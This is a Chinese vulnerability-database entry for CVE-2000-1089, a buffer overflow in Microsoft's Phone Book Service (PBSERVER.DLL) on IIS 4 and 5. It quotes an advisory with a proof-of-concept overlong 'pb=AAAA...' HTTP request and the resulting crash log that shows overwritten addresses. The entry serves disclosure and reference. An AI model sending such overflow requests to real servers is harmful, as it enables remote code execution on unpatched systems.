Microsoft Phone Book Service缓冲区溢出漏洞

Microsoft Phone Book Service缓冲区溢出漏洞

漏洞ID 1106113 漏洞类型 缓冲区溢出
发布时间 2000-12-04 更新时间 2005-10-12
图片[1]-Microsoft Phone Book Service缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-1089
图片[2]-Microsoft Phone Book Service缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200101-026
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20460
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-026
|漏洞详情
MicrosoftPhoneBookService存在缓冲区溢出漏洞。本地用户可以利用该漏洞执行任意命令,也称为”PhoneBookServiceBufferOverflow”漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/2048/info

The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default.

A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with those privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5). 

The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/

According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format:



http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pb
ver=&pb=<STRING=db name>

In the DLL checks the total lenght to ensure that request does not exceed
1024 bytes, however it is
possible to overflow a local variable of fixed length in the DLL by sending
a request with
the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars)
HTTP/1.0nn

The result is an exception reported in the Event log with source WAM like
the following:

The HTTP server encountered an unhandled exception while processing the
ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B

For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.

By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.
|参考资料

来源:ATSTAKE
名称:A120400-1
链接:http://www.stake.com/research/advisories/2000/a120400-1.txt
来源:BID
名称:2048
链接:http://www.securityfocus.com/bid/2048
来源:MS
名称:MS00-094
链接:http://www.microsoft.com/technet/security/bulletin/MS00-094.asp
来源:XF
名称:phone-book-service-bo(5623)
链接:http://xforce.iss.net/xforce/xfdb/5623

相关推荐: MySQL ‘sql_udf.cc’ 目录遍历漏洞

MySQL ‘sql_udf.cc’ 目录遍历漏洞 漏洞ID 1198185 漏洞类型 其他 发布时间 2005-08-16 更新时间 2005-08-16 CVE编号 CVE-2005-2573 CNNVD-ID CNNVD-200508-127 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享